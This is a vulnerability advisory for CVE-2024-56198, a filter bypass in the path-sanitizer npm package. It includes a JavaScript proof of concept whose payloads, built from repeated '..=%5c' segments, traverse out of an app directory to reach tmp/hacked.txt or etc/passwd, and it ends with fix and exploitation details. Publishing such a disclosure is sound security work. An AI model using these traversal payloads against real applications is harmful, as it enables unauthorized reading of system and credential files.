CVE-2024-56198
path-sanitizer allows bypassing the existing filters to achieve path-traversal vulnerability
Description
### Summary

This is a PoC for the path-sanitizer [npm package](https://www.npmjs.com/package/path-sanitizer). The filters can be bypassed, which can result in path traversal. The payload `..=%5c` can be used to bypass the filter on the CLI (along with other candidates). Something similar would likely work on web apps as well.

### PoC

Here's the code to test for the filter bypass:

```js
const sanitize = require("path-sanitizer")
const path = require("path")
const fs = require("fs")

// Real scenario:
function routeHandler(myPath) {
  // Let's just assume that the path was extracted from the request.
  // We want to read a file in the C:\Users\user\Desktop\myApp\ directory,
  // but the user should not be able to reach C:\Users\user\Desktop\,
  // so we need to sanitize the path.
  const APP_DIR = "/var/hacker"
  const sanitized = path.join(APP_DIR, sanitize(myPath))
  // Now we would usually read the file,
  // but in this case we just return the path.
  // console.log(sanitized)
  return sanitized
}

function readFile(filePath) {
  const absolutePath = path.resolve(filePath) // Resolve to absolute path
  fs.readFile(absolutePath, "utf8", (err, data) => {
    if (err) {
      console.error(`Error reading the file: ${err.message}`)
      return
    }
    console.log(`Contents of the file ${filePath} :\n${data}`)
  })
}

const input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5ctmp/hacked.txt"
// const input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5cetc/passwd"
const input_user_payload = "../../../../../../../../tmp/hacked.txt"

readFile(routeHandler(input_user_bypass))
readFile(routeHandler(input_user_payload))
```

Here is a video PoC (this is a Loom recording; only users with the UUID of the video can see it): https://www.loom.com/share/b766ece5193842848ce7562fcd559256?sid=fd826eb6-0eee-4601-bf0e-9cfee5c56e9d

### Impact

Any CLI tool or library using this package may be vulnerable to path traversal.
How to fix CVE-2024-56198
To remediate CVE-2024-56198, upgrade the affected package to a fixed version below.
- Upgrade to 3.1.0 or later
Is CVE-2024-56198 being exploited?
Low — EPSS is 0.8%, meaning exploitation activity has not been observed at scale.